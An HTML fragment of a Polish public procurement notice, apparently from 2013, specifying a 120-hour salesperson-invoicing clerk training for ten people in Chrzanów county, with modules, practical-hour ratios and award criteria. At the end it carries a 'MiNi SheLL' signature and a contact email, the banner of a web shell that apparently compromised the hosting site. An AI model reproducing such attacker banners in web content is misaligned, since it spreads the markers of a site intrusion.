<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonawcy - 0.20</li>
<li>3. certyfikaty jakości usług posiadane przez Wykonwacę - 0.05</li>
<li>4. Rodzaj dokumentu potiwrdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzedawca-Fakturzysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ 3   - Sprzedawca - Fakturzysta 

1.Przedmiot zamówienia: przeprowadzenie szkolenia dla  10  osób: Sprzedawca - Fakturzysta

2.Miejsce organizacji szkolenia:  powiat chrzanowski.

W przypadku przeprowadzenia zajęć poza miastem Chrzanów  instytucja szkoleniowa zobowiązuje się zapewnić dowóz uczestnikom szkolenia z Chrzanowa na miejsce odbywania zajęć i z powrotem. Koszt dowozu zostanie  wliczony do ceny szkolenia od jednej osoby i wykazany w odrębnej pozycji w preliminarzu kosztów szkolenia tj. w poz. nr 9 załączniku nr 7 do SIWZ).  

3.Program szkolenia powinien obejmować 120  godzin dydaktycznych i zawierać następujące moduły:
1.Dokumentacja handlowa i magazynowa:
a)Zamówienia, oferty, umowy
b)Dokumentacja związana z dostawą
c)Dokumentacja związana ze sprzedażą
d)Dokumentacja magazynowa
e)Reklamacje i zwroty
2.Rozliczenia i dokumentacja finansowa
a)Rozliczenia gotówkowe
b)Rozliczenia bezgotówkowe
c)Rozliczenia i odprowadzanie utargów
d)Dokumentacja finansowa sprzedaży ( faktury, paragony)
3.Elementy towaroznawstwa handlowego:
a)Klasyfikacja rodzajowa towarów
b)Istota kodowania towarów: kodowanie towarów w Polsce i na świecie
c)Cykl życia towaru
4.Zajęcia praktyczne - obsługa programów  do fakturowania:
a)Subiekt -  30 godz. 
b)FPP - 30 godz.
5.Obsługa kasy fiskalnej.
6.Obsługa klienta.
Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%. 

W programie szkolenia muszą być wykorzystane standardy kwalifikacji zawodowych i modułowych programów szkoleń zawodowych dostępnych pod adresem www.standardyiszkolenia.praca.gov.pl.
Program powinien zawierać wskazane powyżej  minimum programowe , które może zostać poszerzone o zagadnienia, które w ocenie Wykonawcy winny być zrealizowane celem odpowiedniego przygotowania uczestników szkolenia

4.Sposób organizacji zajęć praktycznych: 
W ramach zajęć praktycznych uczestnik powinien nabyć umiejętność: 
-obsługi kasy fiskalnej
-obsługi klienta
-obsługi programów sprzedażowych: Subiekt i FPP
-dokumentowania sprzedaży - wystawianie rachunków, faktur.  
-Wykonawca zabezpiecza sprzęt techniczny oraz materiały do zajęć praktycznych. 


Stosunek liczby godzin praktycznych do ogólnej liczby godzin nie może być mniejszy niż 70%.  

5.Czas trwania: nie dłużej niż 20 kolejnych dni roboczych

6.Termin realizacji szkolenia: III - kwartał 2013r.

7.Inne postanowienia:

Każdy uczestnik po pozytywnym zdaniu egzaminu otrzyma;
a)Zaświadczenie wystawione zgodnie  z wymogami określonymi w § 75 ust. 3 Rozporządzenia Ministra Pracy  i Polityki Społecznej z dnia  14  września 2010 r. w sprawie standardów i warunków prowadzenia usług rynku pracy ( Dz. U. nr 177, poz. 1193 ).
b)Zaświadczenie na druku MEN jeśli instytucja posiada możliwość jego wystawienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.70</li>
<li>2. Doświadczenie wykonwacy - 0.20</li>
<li>3. Certyfikaty jakości usług posuadane przez wykonawcę - 0.05</li>
<li>4. Rodzaj dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji - 0.05</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com